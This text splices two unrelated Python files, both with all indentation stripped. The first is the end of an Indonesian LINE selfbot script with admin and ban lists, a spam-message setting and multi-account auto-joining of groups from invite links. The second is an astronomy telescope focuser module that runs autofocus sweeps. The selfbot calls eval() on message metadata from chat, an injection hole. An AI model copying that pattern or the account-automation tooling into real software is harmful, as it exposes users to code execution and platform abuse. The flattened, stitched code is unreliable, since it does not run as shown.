except:
pass
#===========ADMIN ADD============#
elif ("Adminadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
admin.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan admin")
except:
pass
elif ("Staffadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
staff.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan staff")
except:
pass
elif ("Botadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
Bots.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan bot")
except:
pass
elif ("Admindell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Dpk:
try:
admin.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Staffdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Dpk:
try:
staff.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Botdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Dpk:
try:
Bots.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif cmd == "admin:on" or text.lower() == 'admin:on':
if msg._from in admin:
wait["addadmin"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "admin:repeat" or text.lower() == 'admin:repeat':
if msg._from in admin:
wait["delladmin"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "staff:on" or text.lower() == 'staff:on':
if msg._from in admin:
wait["addstaff"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "staff:repeat" or text.lower() == 'staff:repeat':
if msg._from in admin:
wait["dellstaff"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "bot:on" or text.lower() == 'bot:on':
if msg._from in admin:
wait["addbots"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "bot:repeat" or text.lower() == 'bot:repeat':
if msg._from in admin:
wait["dellbots"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "refresh" or text.lower() == 'refresh':
if msg._from in admin:
wait["addadmin"] = False
wait["delladmin"] = False
wait["addstaff"] = False
wait["dellstaff"] = False
wait["addbots"] = False
wait["dellbots"] = False
wait["wblacklist"] = False
wait["dblacklist"] = False
wait["Talkwblacklist"] = False
wait["Talkdblacklist"] = False
cl.sendText(msg.to,"Berhasil di Refresh...")
elif cmd == "contact admin" or text.lower() == 'contact admin':
if msg._from in admin:
ma = ""
for i in admin:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact staff" or text.lower() == 'contact staff':
if msg._from in admin:
ma = ""
for i in staff:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact bot" or text.lower() == 'contact bot':
if msg._from in admin:
ma = ""
for i in Bots:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
#===========COMMAND ON OFF============#
elif cmd == "notag on" or text.lower() == 'notag on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Mentionkick"] = True
cl.sendText(msg.to,"Notag diaktifkan")
elif cmd == "notag off" or text.lower() == 'notag off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["MentionKick"] = False
cl.sendText(msg.to,"Notag dinonaktifkan")
elif cmd == "contact on" or text.lower() == 'contact on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = True
cl.sendText(msg.to,"Deteksi contact diaktifkan")
elif cmd == "contact off" or text.lower() == 'contact off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = False
cl.sendText(msg.to,"Deteksi contact dinonaktifkan")
elif cmd == "respon on" or text.lower() == 'respon on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = True
cl.sendText(msg.to,"Auto respon diaktifkan")
elif cmd == "respon off" or text.lower() == 'respon off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = False
cl.sendText(msg.to,"Auto respon dinonaktifkan")
elif cmd == "autojoin on" or text.lower() == 'autojoin on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = True
cl.sendText(msg.to,"Autojoin diaktifkan")
elif cmd == "autojoin off" or text.lower() == 'autojoin off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = False
cl.sendText(msg.to,"Autojoin dinonaktifkan")
elif cmd == "autoleave on" or text.lower() == 'autoleave on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = True
cl.sendText(msg.to,"Autoleave diaktifkan")
elif cmd == "autoleave off" or text.lower() == 'autoleave off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = False
cl.sendText(msg.to,"Autoleave dinonaktifkan")
elif cmd == "autoadd on" or text.lower() == 'autoadd on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = True
cl.sendText(msg.to,"Auto add diaktifkan")
elif cmd == "autoadd off" or text.lower() == 'autoadd off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = False
cl.sendText(msg.to,"Auto add dinonaktifkan")
elif cmd == "read on" or text.lower() == 'autoread on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoRead"] = True
cl.sendText(msg.to,"Auto add diaktifkan")
elif cmd == "read off" or text.lower() == 'autoread off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoRead"] = False
cl.sendText(msg.to,"Auto add dinonaktifkan")
elif cmd == "sticker on" or text.lower() == 'sticker on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = True
cl.sendText(msg.to,"Deteksi sticker diaktifkan")
elif cmd == "sticker off" or text.lower() == 'sticker off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = False
cl.sendText(msg.to,"Deteksi sticker dinonaktifkan")
elif cmd == "jointicket on" or text.lower() == 'jointicket on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoinTicket"] = True
cl.sendText(msg.to,"Join ticket diaktifkan")
elif cmd == "jointicket off" or text.lower() == 'jointicket off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoinTicket"] = False
cl.sendText(msg.to,"Autojoin Tiket dinonaktifkan")
#===========COMMAND BLACKLIST============#
elif ("Talkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["Talkblacklist"][target] = True
cl.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Untalkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["Talkblacklist"][target]
cl.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "talkban:on" or text.lower() == 'talkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkwblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "untalkban:on" or text.lower() == 'untalkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkdblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif ("Ban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
cl.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Unban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
cl.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "ban:on" or text.lower() == 'ban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "unban:on" or text.lower() == 'unban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "banlist" or text.lower() == 'banlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
a = 0
for m_id in wait["blacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"★GHOVINBOT★ Blacklist User\n\n"+ma+"\nTotal「%s」Blacklist User" %(str(len(wait["blacklist"]))))
elif cmd == "talkbanlist" or text.lower() == 'talkbanlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["Talkblacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada Talkban user")
else:
ma = ""
a = 0
for m_id in wait["Talkblacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"♣GHOVINBOT♣ Talkban User\n\n"+ma+"\nTotal「%s」Talkban User" %(str(len(wait["Talkblacklist"]))))
elif cmd == "blc" or text.lower() == 'blc':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
for i in wait["blacklist"]:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "clearban" or text.lower() == 'clearban':
if wait["selfbot"] == True:
if msg._from in admin:
wait["blacklist"] = {}
ragets = cl.getContacts(wait["blacklist"])
mc = "「%i」User Blacklist" % len(ragets)
cl.sendMessage(msg.to,"Sukses membersihkan " +mc)
#===========COMMAND SET============#
elif 'Set pesan: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set pesan: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Pesan Msg")
else:
wait["message"] = spl
cl.sendMessage(msg.to, "「Pesan Msg」\nPesan Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set welcome: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set welcome: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Welcome Msg")
else:
wait["welcome"] = spl
cl.sendMessage(msg.to, "「Welcome Msg」\nWelcome Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set respon: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set respon: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Respon Msg")
else:
wait["Respontag"] = spl
cl.sendMessage(msg.to, "「Respon Msg」\nRespon Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set spam: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set spam: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Spam")
else:
Setmain["ARmessage1"] = spl
cl.sendMessage(msg.to, "「Spam Msg」\nSpam Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set sider: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set sider: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Sider Msg")
else:
wait["mention"] = spl
cl.sendMessage(msg.to, "「Sider Msg」\nSider Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif text.lower() == "cek pesan":
if msg._from in admin:
cl.sendMessage(msg.to, "「Pesan Msg」\nPesan Msg mu :\n\n「 " + str(wait["message"]) + " 」")
elif text.lower() == "cek welcome":
if msg._from in admin:
cl.sendMessage(msg.to, "「Welcome Msg」\nWelcome Msg mu :\n\n「 " + str(wait["welcome"]) + " 」")
elif text.lower() == "cek respon":
if msg._from in admin:
cl.sendMessage(msg.to, "「Respon Msg」\nRespon Msg mu :\n\n「 " + str(wait["Respontag"]) + " 」")
elif text.lower() == "cek spam":
if msg._from in admin:
cl.sendMessage(msg.to, "「Spam Msg」\nSpam Msg mu :\n\n「 " + str(Setmain["ARmessage1"]) + " 」")
elif text.lower() == "cek sider":
if msg._from in admin:
cl.sendMessage(msg.to, "「Sider Msg」\nSider Msg mu :\n\n「 " + str(wait["mention"]) + " 」")
#===========JOIN TICKET============#
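# When jointicket is on, group invite links of the form line.me/R/ti/g/<ticket>
# (or line://ti/g/<ticket>) are extracted with a regex; each unique ticket is
# resolved to a group and all four accounts join it via acceptGroupInvitationByTicket.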
elif "/ti/g/" in msg.text.lower():
if wait["selfbot"] == True:
if settings["autoJoinTicket"] == True:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
cl.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group1 = ki.findGroupByTicket(ticket_id)
ki.acceptGroupInvitationByTicket(group1.id,ticket_id)
ki.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group2 = kk.findGroupByTicket(ticket_id)
kk.acceptGroupInvitationByTicket(group2.id,ticket_id)
kk.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group3 = kc.findGroupByTicket(ticket_id)
kc.acceptGroupInvitationByTicket(group3.id,ticket_id)
kc.sendMessage(msg.to, "Masuk : %s" % str(group.name))
except Exception as error:
print (error)
while True:
try:
ops = poll.singleTrace(count=50)
if ops is not None:
for op in ops:
poll.setRevision(op.revision)
thread1 = threading.Thread(target=bot, args=(op,))#self.OpInterrupt[op.type], args=(op,)
thread1.start()
thread1.join()
except Exception as e:
pass
|
focuser.py
|
import os
from abc import ABCMeta
from abc import abstractmethod
from threading import Event
from threading import Thread
import numpy as np
from scipy.ndimage import binary_dilation
from astropy.modeling import models
from astropy.modeling import fitting
from panoptes.pocs.base import PanBase
from panoptes.utils.time import current_time
from panoptes.utils.images import focus as focus_utils
from panoptes.utils.images import mask_saturated
from panoptes.pocs.utils.plotting import make_autofocus_plot
class AbstractFocuser(PanBase, metaclass=ABCMeta):
"""Base class for all focusers.
Args:
name (str, optional): name of the focuser
model (str, optional): model of the focuser
port (str, optional): port the focuser is connected to, e.g. a device node
camera (pocs.camera.Camera, optional): camera that this focuser is associated with.
timeout (int, optional): time to wait for response from focuser.
initial_position (int, optional): if given the focuser will move to this position
following initialisation.
autofocus_range ((int, int), optional): Coarse & fine focus sweep range, in encoder units
autofocus_step ((int, int), optional): Coarse & fine focus sweep steps, in encoder units
autofocus_seconds (scalar, optional): Exposure time for focus exposures
autofocus_size (int, optional): Size of square central region of image to use, default
500 x 500 pixels.
autofocus_keep_files (bool, optional): If True will keep all images taken during focusing.
If False (default) will delete all except the first and last images from each focus run.
autofocus_take_dark (bool, optional): If True will attempt to take a dark frame before the
focus run, and use it for dark subtraction and hot pixel masking, default True.
autofocus_merit_function (str/callable, optional): Merit function to use as a focus metric,
default vollath_F4
autofocus_merit_function_kwargs (dict, optional): Dictionary of additional keyword arguments
for the merit function.
autofocus_mask_dilations (int, optional): Number of iterations of dilation to perform on the
saturated pixel mask (determine size of masked regions), default 10
autofocus_make_plots (bool, optional): Whether to write focus plots to images folder,
default False.
"""
def __init__(self,
name='Generic Focuser',
model='simulator',
port=None,
camera=None,
timeout=5,
initial_position=None,
autofocus_range=None,
autofocus_step=None,
autofocus_seconds=None,
autofocus_size=None,
autofocus_keep_files=None,
autofocus_take_dark=None,
autofocus_merit_function=None,
autofocus_merit_function_kwargs=None,
autofocus_mask_dilations=None,
autofocus_make_plots=False,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.model = model
self.port = port
self.name = name
self._connected = False
self._serial_number = 'XXXXXX'
self.timeout = timeout
if initial_position is None:
self._position = None
else:
self._position = int(initial_position)
self._set_autofocus_parameters(autofocus_range,
autofocus_step,
autofocus_seconds,
autofocus_size,
autofocus_keep_files,
autofocus_take_dark,
autofocus_merit_function,
autofocus_merit_function_kwargs,
autofocus_mask_dilations,
autofocus_make_plots)
self._autofocus_error = None
self._camera = camera
self.logger.debug('Focuser created: {} on {}'.format(self.name, self.port))
##################################################################################################
# Properties
##################################################################################################
@property
def uid(self):
""" A serial number for the focuser """
return self._serial_number
@property
def is_connected(self):
""" Is the focuser available """
return self._connected
@property
def position(self):
""" Current encoder position of the focuser """
return self._position
@position.setter
def position(self, position):
""" Move focusser to new encoder position """
self.move_to(position)
@property
def camera(self):
"""
Reference to the Camera object that the Focuser is assigned to, if any. A Focuser
should only ever be assigned to one or zero Cameras!
"""
return self._camera
@camera.setter
def camera(self, camera):
if self._camera:
if self._camera != camera:
self.logger.warning(f"{self} already assigned to {self._camera}, "
f"skipping attempted assignment to {camera}!")
else:
self._camera = camera
@property
@abstractmethod
def min_position(self):
""" Get position of close limit of focus travel, in encoder units """
raise NotImplementedError
@property
@abstractmethod
def max_position(self):
""" Get position of far limit of focus travel, in encoder units """
raise NotImplementedError
@property
@abstractmethod
def is_moving(self):
""" True if the focuser is currently moving. """
raise NotImplementedError
@property
def is_ready(self):
# A focuser is 'ready' if it is not currently moving.
return not self.is_moving
@property
def autofocus_error(self):
""" Error message from the most recent autofocus or None, if there was no error."""
return self._autofocus_error
##################################################################################################
# Methods
##################################################################################################
@abstractmethod
def move_to(self, position):
""" Move focuser to new encoder position """
raise NotImplementedError
def move_by(self, increment):
""" Move focuser by a given amount """
return self.move_to(self.position + increment)
def autofocus(self,
seconds=None,
focus_range=None,
focus_step=None,
cutout_size=None,
keep_files=None,
take_dark=None,
merit_function=None,
merit_function_kwargs=None,
mask_dilations=None,
coarse=False,
make_plots=None,
blocking=False):
"""
Focuses the camera using the specified merit function. Optionally performs
a coarse focus to find the approximate position of infinity focus, which
should be followed by a fine focus before observing.
Args:
seconds (scalar, optional): Exposure time for focus exposures, if not
specified will use value from config.
focus_range (2-tuple, optional): Coarse & fine focus sweep range, in
encoder units. Specify to override values from config.
focus_step (2-tuple, optional): Coarse & fine focus sweep steps, in
encoder units. Specify to override values from config.
cutout_size (int, optional): Size of square central region of image
to use, default 500 x 500 pixels.
keep_files (bool, optional): If True will keep all images taken
during focusing. If False (default) will delete all except the
first and last images from each focus run.
take_dark (bool, optional): If True will attempt to take a dark frame
before the focus run, and use it for dark subtraction and hot
pixel masking, default True.
merit_function (str/callable, optional): Merit function to use as a
focus metric, default vollath_F4.
merit_function_kwargs (dict, optional): Dictionary of additional
keyword arguments for the merit function.
mask_dilations (int, optional): Number of iterations of dilation to perform on the
saturated pixel mask (determine size of masked regions), default 10
coarse (bool, optional): Whether to perform a coarse focus, otherwise will perform
a fine focus. Default False.
make_plots (bool, optional): Whether to write focus plots to images folder. If not
given will fall back on value of `autofocus_make_plots` set on initialisation,
and if it wasn't set then will default to False.
blocking (bool, optional): Whether to block until autofocus complete, default False.
Returns:
threading.Event: Event that will be set when autofocusing is complete
Raises:
ValueError: If invalid values are passed for any of the focus parameters.
"""
self.logger.debug('Starting autofocus')
assert self._camera.is_connected, self.logger.error("Camera must be connected for autofocus!")
assert self.is_connected, self.logger.error("Focuser must be connected for autofocus!")
if not focus_range:
if self.autofocus_range:
focus_range = self.autofocus_range
else:
raise ValueError(
"No focus_range specified, aborting autofocus of {}!".format(self._camera))
if not focus_step:
if self.autofocus_step:
focus_step = self.autofocus_step
else:
raise ValueError(
"No focus_step specified, aborting autofocus of {}!".format(self._camera))
if not seconds:
if self.autofocus_seconds:
seconds = self.autofocus_seconds
else:
raise ValueError(
"No focus exposure time specified, aborting autofocus of {}!".format(self._camera))
if not cutout_size:
if self.autofocus_size:
cutout_size = self.autofocus_size
else:
raise ValueError(
"No focus thumbnail size specified, aborting autofocus of {}!".format(self._camera))
if keep_files is None:
if self.autofocus_keep_files:
keep_files = True
else:
keep_files = False
if take_dark is None:
if self.autofocus_take_dark is not None:
take_dark = self.autofocus_take_dark
else:
take_dark = True
if not merit_function:
if self.autofocus_merit_function:
merit_function = self.autofocus_merit_function
else:
merit_function = 'vollath_F4'
if not merit_function_kwargs:
if self.autofocus_merit_function_kwargs:
merit_function_kwargs = self.autofocus_merit_function_kwargs
else:
merit_function_kwargs = {}
if mask_dilations is None:
if self.autofocus_mask_dilations is not None:
mask_dilations = self.autofocus_mask_dilations
else:
mask_dilations = 10
if make_plots is None:
make_plots = self.autofocus_make_plots
# Set up the focus parameters
focus_event = Event()
focus_params = {
'seconds': seconds,
'focus_range': focus_range,
'focus_step': focus_step,
'cutout_size': cutout_size,
'keep_files': keep_files,
'take_dark': take_dark,
'merit_function': merit_function,
'merit_function_kwargs': merit_function_kwargs,
'mask_dilations': mask_dilations,
'coarse': coarse,
'make_plots': make_plots,
'focus_event': focus_event,
}
focus_thread = Thread(target=self._autofocus, kwargs=focus_params)
focus_thread.start()
if blocking:
focus_event.wait()
return focus_event
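# Illustrative usage (a sketch, not part of the original class): assuming a
# connected camera exposes this focuser as `camera.focuser`, a coarse run
# followed by a blocking fine run could look like:
#
#     camera.focuser.autofocus(coarse=True, blocking=True)
#     fine_event = camera.focuser.autofocus()  # returns a threading.Event
#     fine_event.wait()                        # block until the fine run is done
#
# The `camera` name is hypothetical; any camera with this focuser attached
# behaves the same way.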
def _autofocus(self,
seconds,
focus_range,
focus_step,
cutout_size,
keep_files,
take_dark,
merit_function,
merit_function_kwargs,
mask_dilations,
make_plots,
coarse,
focus_event,
*args,
**kwargs):
"""Private helper method for calling autofocus in a Thread.
See public `autofocus` for information about the parameters.
"""
focus_type = 'fine'
if coarse:
focus_type = 'coarse'
initial_focus = self.position
self.logger.debug(f"Beginning {focus_type} autofocus of {self._camera} - "
f"initial position: {initial_focus}")
# Set up paths for temporary focus files, and plots if requested.
image_dir = self.get_config('directories.images')
start_time = current_time(flatten=True)
file_path_root = os.path.join(image_dir, 'focus', self._camera.uid, start_time)
self._autofocus_error = None
dark_cutout = None
if take_dark:
dark_path = os.path.join(file_path_root, f'dark.{self._camera.file_extension}')
self.logger.debug(f'Taking dark frame {dark_path} on camera {self._camera}')
try:
dark_cutout = self._camera.get_cutout(seconds,
dark_path,
cutout_size,
keep_file=True,
dark=True)
# Mask 'saturated' with a low threshold to remove hot pixels
dark_cutout = mask_saturated(dark_cutout,
threshold=0.3,
bit_depth=self.camera.bit_depth)
except Exception as err:
self.logger.error(f"Error taking dark frame: {err!r}")
self._autofocus_error = repr(err)
focus_event.set()
raise err
# Take an image before focusing, grab a cutout from the centre and add it to the plot
initial_fn = f"{initial_focus}-{focus_type}-initial.{self._camera.file_extension}"
initial_path = os.path.join(file_path_root, initial_fn)
try:
initial_cutout = self._camera.get_cutout(seconds, initial_path, cutout_size,
keep_file=True)
initial_cutout = mask_saturated(initial_cutout, bit_depth=self.camera.bit_depth)
if dark_cutout is not None:
initial_cutout = initial_cutout.astype(np.int32) - dark_cutout
except Exception as err:
self.logger.error(f"Error taking initial image: {err!r}")
self._autofocus_error = repr(err)
focus_event.set()
raise err
# Set up encoder positions for autofocus sweep, truncating at focus travel
# limits if required.
if coarse:
focus_range = focus_range[1]
focus_step = focus_step[1]
else:
focus_range = focus_range[0]
focus_step = focus_step[0]
# Get focus steps.
focus_positions = np.arange(max(initial_focus - focus_range / 2, self.min_position),
min(initial_focus + focus_range / 2, self.max_position) + 1,
focus_step, dtype=int)  # plain int; np.int is removed in recent NumPy
n_positions = len(focus_positions)
# Set up empty array holders
cutouts = np.zeros((n_positions, cutout_size, cutout_size), dtype=initial_cutout.dtype)
masks = np.empty((n_positions, cutout_size, cutout_size), dtype=bool)  # np.bool is removed in recent NumPy
metrics = np.empty(n_positions)
# Take and store an exposure for each focus position.
for i, position in enumerate(focus_positions):
# Move focus, updating focus_positions with actual encoder position after move.
focus_positions[i] = self.move_to(position)
focus_fn = f"{focus_positions[i]}-{i:02d}.{self._camera.file_extension}"
file_path = os.path.join(file_path_root, focus_fn)
# Take exposure.
try:
cutouts[i] = self._camera.get_cutout(seconds, file_path, cutout_size,
keep_file=keep_files)
except Exception as err:
self.logger.error(f"Error taking image {i + 1}: {err!r}")
self._autofocus_error = repr(err)
focus_event.set()
raise err
masks[i] = mask_saturated(cutouts[i], bit_depth=self.camera.bit_depth).mask
self.logger.debug(f'Making master mask with binary dilation for {self._camera}')
master_mask = masks.any(axis=0)
master_mask = binary_dilation(master_mask, iterations=mask_dilations)
# Apply the master mask and then get metrics for each frame.
for i, cutout in enumerate(cutouts):
self.logger.debug(f'Applying focus metric to cutout {i:02d}')
if dark_cutout is not None:
cutout = cutout.astype(np.float32) - dark_cutout
cutout = np.ma.array(cutout, mask=np.ma.mask_or(master_mask, np.ma.getmask(cutout)))
metrics[i] = focus_utils.focus_metric(cutout, merit_function, **merit_function_kwargs)
self.logger.debug(f'Focus metric for cutout {i:02d}: {metrics[i]}')
# Only fit a fine focus.
fitted = False
fitting_indices = [None, None]
# Find maximum metric values.
imax = metrics.argmax()
if imax == 0 or imax == (n_positions - 1):
# TODO: have this automatically switch to coarse focus mode if this happens
self.logger.warning(f"Best focus outside sweep range, stopping focus and using"
f" {focus_positions[imax]}")
best_focus = focus_positions[imax]
elif not coarse:
# Fit data around the maximum value to determine best focus position.
# Initialise models
shift = models.Shift(offset=-focus_positions[imax])
# Small initial coeffs with expected sign. Helps fitting start in the right direction.
poly = models.Polynomial1D(degree=4, c0=1, c1=0, c2=-1e-2, c3=0, c4=-1e-4,
fixed={'c0': True, 'c1': True, 'c3': True})
scale = models.Scale(factor=metrics[imax])
# https://docs.astropy.org/en/stable/modeling/compound-models.html?#model-composition
reparameterised_polynomial = shift | poly | scale
# Initialise fitter
fitter = fitting.LevMarLSQFitter()
# Select data range for fitting. Tries to use 2 points either side of max, if in range.
fitting_indices = (max(imax - 2, 0), min(imax + 2, n_positions - 1))
# Fit models to data
fit = fitter(reparameterised_polynomial,
focus_positions[fitting_indices[0]:fitting_indices[1] + 1],
metrics[fitting_indices[0]:fitting_indices[1] + 1])
# Get the encoder position of the best focus.
best_focus = np.abs(fit.offset_0)
fitted = True
# Guard against fitting failures, force best focus to stay within sweep range.
min_focus = focus_positions[0]
max_focus = focus_positions[-1]
if best_focus < min_focus:
self.logger.warning(f"Fitting failure: best focus {best_focus} below sweep limit"
f" {min_focus}")
best_focus = focus_positions[1]
if best_focus > max_focus:
self.logger.warning(f"Fitting failure: best focus {best_focus} above sweep limit"
f" {max_focus}")
best_focus = focus_positions[-2]
else:
# Coarse focus, just use max value.
best_focus = focus_positions[imax]
# Move the focuser to best focus position.
final_focus = self.move_to(best_focus)
# Get final cutout.
final_fn = f"{final_focus}-{focus_type}-final.{self._camera.file_extension}"
file_path = os.path.join(file_path_root, final_fn)
try:
final_cutout = self._camera.get_cutout(seconds, file_path, cutout_size,
keep_file=True)
final_cutout = mask_saturated(final_cutout, bit_depth=self.camera.bit_depth)
if dark_cutout is not None:
final_cutout = final_cutout.astype(np.int32) - dark_cutout
except Exception as err:
self.logger.error(f"Error taking final image: {err!r}")
self._autofocus_error = repr(err)
focus_event.set()
raise err
if make_plots:
line_fit = None
if fitted:
focus_range = np.arange(focus_positions[fitting_indices[0]],
focus_positions[fitting_indices[1]] + 1)
fit_line = fit(focus_range)
line_fit = [focus_range, fit_line]
plot_title = f'{self._camera} {focus_type} focus at {start_time}'
# Make the plots
plot_path = os.path.join(file_path_root, f'{focus_type}-focus.png')
plot_path = make_autofocus_plot(plot_path,
initial_cutout,
final_cutout,
initial_focus,
final_focus,
focus_positions,
metrics,
merit_function,
plot_title=plot_title,
line_fit=line_fit
)
self.logger.info(f"{focus_type.capitalize()} focus plot for {self._camera} written to "
f" {plot_path}")
self.logger.debug(f"Autofocus of {self._camera} complete - final focus"
f" position: {final_focus}")
if focus_event:
focus_event.set()
return initial_focus, final_focus
def _set_autofocus_parameters(self,
autofocus_range,
autofocus_step,
autofocus_seconds,
autofocus_size,
autofocus_keep_files,
autofocus_take_dark,
autofocus_merit_function,
autofocus_merit_function_kwargs,
autofocus_mask_dilations,
autofocus_make_plots):
# Moved to a separate private method to make it possible to override.
if autofocus_range:
self.autofocus_range = (int(autofocus_range[0]), int(autofocus_range[1]))
else:
self.autofocus_range = None
if autofocus_step:
self.autofocus_step = (int(autofocus_step[0]), int(autofocus_step[1]))
else:
self.autofocus_step = None
self.autofocus_seconds = autofocus_seconds
self.autofocus_size = autofocus_size
self.autofocus_keep_files = autofocus_keep_files
self.autofocus_take_dark = autofocus_take_dark
self.autofocus_merit_function = autofocus_merit_function
self.autofocus_merit_function_kwargs = autofocus_merit_function_kwargs
